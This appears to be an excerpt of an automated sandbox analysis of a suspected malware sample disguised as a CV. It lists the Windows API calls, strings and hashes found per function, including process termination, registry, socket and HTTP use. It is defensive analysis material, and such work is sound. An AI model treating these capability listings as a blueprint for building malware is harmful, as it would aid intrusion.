                                                                                        • Instruction Fuzzy Hash: 600167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A868CBE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 1423608774-0
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003C7C07
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003C7C1D
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 003C7C2C
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C7C3B
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C7C45
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C7C4C
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 003C9A33
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C9A44
                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C9A51
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C9A5E
                                                                                          • Part of subcall function 003C93D1: CloseHandle.KERNEL32(?,?,003C9A6B,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C93DB
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C9A71
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C9A78
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        APIs
                                                                                          • Part of subcall function 0039F4EA: std::exception::exception.LIBCMT ref: 0039F51E
                                                                                          • Part of subcall function 0039F4EA: __CxxThrowException@8.LIBCMT ref: 0039F533
                                                                                        • __swprintf.LIBCMT ref: 00381EA6
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00381D49
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 2125237772-557222456
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 003DB006
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003DB115
                                                                                        • VariantClear.OLEAUT32(?), ref: 003DB298
                                                                                          • Part of subcall function 003C9DC5: VariantInit.OLEAUT32(00000000), ref: 003C9E05
                                                                                          • Part of subcall function 003C9DC5: VariantCopy.OLEAUT32(?,?), ref: 003C9E0E
                                                                                          • Part of subcall function 003C9DC5: VariantClear.OLEAUT32(?), ref: 003C9E1A
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        APIs
                                                                                          • Part of subcall function 0039C6F4: _wcscpy.LIBCMT ref: 0039C717
                                                                                        • _memset.LIBCMT ref: 003C5438
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 003C5467
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C5513
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003C553D
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003C027B
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003C02B1
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003C02C2
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003C0344
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C5075
                                                                                        • GetMenuItemInfoW.USER32 ref: 003C5091
                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003C50D7
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00441708,00000000), ref: 003C5120
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 003E0587
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 2358735015-567219261
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003BB88E
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003BB8A1
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 003BB8D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: f17fdd98e2643ab0c1dfd03dd7e6addbb2e0f08c4c695dd5613ed7d60eada37a
                                                                                        • Instruction ID: 9f79d4a38e68fada69fc2d665c3ae296742ac5f7afbb8baf8f22095161c2f292
                                                                                        • Opcode Fuzzy Hash: f17fdd98e2643ab0c1dfd03dd7e6addbb2e0f08c4c695dd5613ed7d60eada37a
                                                                                        • Instruction Fuzzy Hash: 1C21E475900208AFDB16ABA4D886DFEB77CDF45358B104529F111AA1E0DFB85D0A9760
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D4401
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D4427
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003D4457
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 003D449E
                                                                                          • Part of subcall function 003D5052: GetLastError.KERNEL32(?,?,003D43CC,00000000,00000000,00000001), ref: 003D5067
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 1951874230-3916222277
                                                                                        • Opcode ID: 0c7a833c74de0d6fcf82561ddbfe2eebe1ab0eb88857192711236f7b3c96dd91
                                                                                        • Instruction ID: d50d47d48335cce5b343a183c3a1a71b5f728a07e981dd70a5220736c227c424
                                                                                        • Opcode Fuzzy Hash: 0c7a833c74de0d6fcf82561ddbfe2eebe1ab0eb88857192711236f7b3c96dd91
                                                                                        • Instruction Fuzzy Hash: A02180B2500208BFE7129F95ED85EBFB6FCEB49748F10802BF505A7240DA748D499771
                                                                                        APIs
                                                                                          • Part of subcall function 0039D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0039D1BA
                                                                                          • Part of subcall function 0039D17C: GetStockObject.GDI32(00000011), ref: 0039D1CE
                                                                                          • Part of subcall function 0039D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0039D1D8
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003E915C
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 003E9163
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003E9178
                                                                                        • DestroyWindow.USER32(?), ref: 003E9180
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: 55e4e37c3f0886826cd50c4df1a9f035bf058cfce1895abd2a0fab17694b3800
                                                                                        • Instruction ID: f3540ad3b760283ae5e05dabf207e180257c943fde73b5607b99a9f9f4d2ca88
                                                                                        • Opcode Fuzzy Hash: 55e4e37c3f0886826cd50c4df1a9f035bf058cfce1895abd2a0fab17694b3800
                                                                                        • Instruction Fuzzy Hash: 8721BE71600296BBEF224E66DC84FFA37ADEB99364F11072AF910A61D0C776DC41A760
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 003C9588
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C95B9
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 003C95CB
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003C9605
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: 55a8636e82a1b58c5925f93b142aeb0125a084f04de8a4f5cd9b26c0714207fc
                                                                                        • Instruction ID: cf4d742e42bb6d534bf3a003b5fb850e1f294752f9927be062bb75a8033229d7
                                                                                        • Opcode Fuzzy Hash: 55a8636e82a1b58c5925f93b142aeb0125a084f04de8a4f5cd9b26c0714207fc
                                                                                        • Instruction Fuzzy Hash: 19219270500205ABDB22AF65DC09F9A77F8AF46720F224A5EF8A1E72D0D770DD45CB10
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 003C9653
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C9683
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 003C9694
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003C96CE
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: e189ad2fb91f3d39e0ff251ace2481dce42a53e82c0a145660a9b272e4315c8b
                                                                                        • Instruction ID: f02234b72276f2e75d30535ae7154ce416d6ae52ed8a547ee3bb8c0bea0127e4
                                                                                        • Opcode Fuzzy Hash: e189ad2fb91f3d39e0ff251ace2481dce42a53e82c0a145660a9b272e4315c8b
                                                                                        • Instruction Fuzzy Hash: B421B3716002059BDB219F698C08F9AB7ECAF44730F220A1EF8A1E72D0DB70DC65CB14
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003CDB0A
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003CDB5E
                                                                                        • __swprintf.LIBCMT ref: 003CDB77
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0041DC00), ref: 003CDBB5
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 11adefefed875912dfb7ea453e1a6ad32d8503f0da2437339d1dbf626cc09cae
                                                                                        • Instruction ID: c505883a6d0501fb0cf75e29700b45f350c30070a8e11a36af127ac5084ec713
                                                                                        • Opcode Fuzzy Hash: 11adefefed875912dfb7ea453e1a6ad32d8503f0da2437339d1dbf626cc09cae
                                                                                        • Instruction Fuzzy Hash: AA216835A00208AFCB11EFA4CD85EEEB7B8EF49704B1140A9F509EB251DB71EE45CB65
                                                                                        APIs
                                                                                          • Part of subcall function 003BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003BC84A
                                                                                          • Part of subcall function 003BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003BC85D
                                                                                          • Part of subcall function 003BC82D: GetCurrentThreadId.KERNEL32 ref: 003BC864
                                                                                          • Part of subcall function 003BC82D: AttachThreadInput.USER32(00000000), ref: 003BC86B
                                                                                        • GetFocus.USER32 ref: 003BCA05
                                                                                          • Part of subcall function 003BC876: GetParent.USER32(?), ref: 003BC884
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 003BCA4E
                                                                                        • EnumChildWindows.USER32(?,003BCAC4), ref: 003BCA76
                                                                                        • __swprintf.LIBCMT ref: 003BCA90
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 3187004680-1110647743
                                                                                        • Opcode ID: aa90804b85211c0b6781a4b438bc0ea4a8ca4cb661d4351be4621e1b1b014b5d
                                                                                        • Instruction ID: 995b75e29aea8e284011670cf4b3c08c1c03b937ac10c79132c040f4ec6e8e91
                                                                                        • Opcode Fuzzy Hash: aa90804b85211c0b6781a4b438bc0ea4a8ca4cb661d4351be4621e1b1b014b5d
                                                                                        • Instruction Fuzzy Hash: 301184B59102057BCB12BFA0CD86FE9376DAF44718F005066FE08AE182DB749545DB74
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 003A7AD8
                                                                                          • Part of subcall function 003A7CF4: __mtinitlocknum.LIBCMT ref: 003A7D06
                                                                                          • Part of subcall function 003A7CF4: EnterCriticalSection.KERNEL32(00000000,?,003A7ADD,0000000D), ref: 003A7D1F
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 003A7AE5
                                                                                        • __lock.LIBCMT ref: 003A7AF9
                                                                                        • ___addlocaleref.LIBCMT ref: 003A7B17
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                        • String ID: `@
                                                                                        • API String ID: 1687444384-951712118
                                                                                        • Opcode ID: efe6108059586bd7cab1937d0e7241b7a2ec17ec31fcd9808a0b8e18c523b23d
                                                                                        • Instruction ID: db95bd69d36a3af54f7ac7d7dfcb8d69924a03fe6d61cc74c050f7bb9c988b01
                                                                                        • Opcode Fuzzy Hash: efe6108059586bd7cab1937d0e7241b7a2ec17ec31fcd9808a0b8e18c523b23d
                                                                                        • Instruction Fuzzy Hash: 430180B1544B00DFD722DF75C94A74AB7F0EF55321F20890EE4DA9B6A0CBB4A644CB15
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003EE33D
                                                                                        • _memset.LIBCMT ref: 003EE34C
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00443D00,00443D44), ref: 003EE37B
                                                                                        • CloseHandle.KERNEL32 ref: 003EE38D
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID: D=D
                                                                                        • API String ID: 3277943733-2475372857
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003E19F3
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003E1A26
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003E1B49
                                                                                        • CloseHandle.KERNEL32(?), ref: 003E1BBF
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 003C1CB4
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 003C1D26
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 003C1D81
                                                                                        • VariantClear.OLEAUT32(?), ref: 003C1DF8
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003C1E26
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                        • String ID:
                                                                                        • API String ID: 4136290138-0
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003E06EE
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003E077D
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 003E079B
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003E07E1
                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 003E07FB
                                                                                          • Part of subcall function 0039E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003CA574,?,?,00000000,00000008), ref: 0039E675
                                                                                          • Part of subcall function 0039E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003CA574,?,?,00000000,00000008), ref: 0039E699
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        APIs
                                                                                          • Part of subcall function 003E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E2EEF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E2F2E
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003E2F75
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 003E2FA1
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003E2FAE
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3740051246-0
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003D12B4
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003D12DD
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003D131C
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003D1341
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003D1349
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(000000FF), ref: 0039B64F
                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0039B66C
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 0039B691
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0039B69F
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 003BB369
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 003BB413
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003BB41B
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 003BB429
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003BB431
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 003BDBD7
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003BDBF4
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003BDC2C
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003BDC52
                                                                                        • _wcsstr.LIBCMT ref: 003BDC5C
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: 93bd7bb6c009815a03c83f8bb209d8f3430a7908de5ae409a59c088d8475a61c
                                                                                        • Instruction ID: d6103dcf0f9f6eb74e1bd2b33ebf1a49b57b4696cec63fd14f39b858ba45618f
                                                                                        • Opcode Fuzzy Hash: 93bd7bb6c009815a03c83f8bb209d8f3430a7908de5ae409a59c088d8475a61c
                                                                                        • Instruction Fuzzy Hash: 91214971204100BBEB169F799D49EBB7FACDF45724F118039F909DA081FAB1CC01D260
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003BBC90
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003BBCC2
                                                                                        • __itow.LIBCMT ref: 003BBCDA
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003BBD00
                                                                                        • __itow.LIBCMT ref: 003BBD11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: a768f5911dde147ce148a451a2e23f2c7179730fe5c81113db4523c6bfd4ffaf
                                                                                        • Instruction ID: ced8cab7fe53a3311a372a8c94a0fd30755141c95b97c4d31c4141bff4c3ebe3
                                                                                        • Opcode Fuzzy Hash: a768f5911dde147ce148a451a2e23f2c7179730fe5c81113db4523c6bfd4ffaf
                                                                                        • Instruction Fuzzy Hash: FE21D775A002086BDB12AE648D46FDEBB6CAF8A314F000465FA05EF181DFB4890583A1
                                                                                        APIs
                                                                                          • Part of subcall function 003850E6: _wcsncpy.LIBCMT ref: 003850FA
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,003C60C3), ref: 003C6369
                                                                                        • GetLastError.KERNEL32(?,?,?,003C60C3), ref: 003C6374
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003C60C3), ref: 003C6388
                                                                                        • _wcsrchr.LIBCMT ref: 003C63AA
                                                                                          • Part of subcall function 003C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003C60C3), ref: 003C63E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3633006590-0
                                                                                        • Opcode ID: 599ab524faef3b1424e87b038e8d25d2789655eb519b7cb582738500ec20cf22
                                                                                        • Instruction ID: cd68c8a836cdd3d7fb55e654b7fb4d35fa75e42313f3ff5f4ec8b9a9c3684c7c
                                                                                        • Opcode Fuzzy Hash: 599ab524faef3b1424e87b038e8d25d2789655eb519b7cb582738500ec20cf22
                                                                                        • Instruction Fuzzy Hash: ED21D8359042555ADF17AB789C43FEA236CEF06360F1104ADF045DB0E1EF60DD848B65
                                                                                        APIs
                                                                                          • Part of subcall function 003DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003DA84E
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003D8BD3
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8BE2
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 003D8BFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3701255441-0
                                                                                        • Opcode ID: e7d7be0201840874fbbda8a6f484f2d7548585157eb069f2689cebcb3573aae6
                                                                                        • Instruction ID: 43cac0d20629adc4e3b73dab241529446d47eae1094719324cd81bcbbce238f6
                                                                                        • Opcode Fuzzy Hash: e7d7be0201840874fbbda8a6f484f2d7548585157eb069f2689cebcb3573aae6
                                                                                        • Instruction Fuzzy Hash: 8F218E326002149FCB16AF68DD85F7EB7A9EF48710F04445AF916AB392CB74EC058B61
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 003D8441
                                                                                        • GetForegroundWindow.USER32 ref: 003D8458
                                                                                        • GetDC.USER32(00000000), ref: 003D8494
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 003D84A0
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 003D84DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
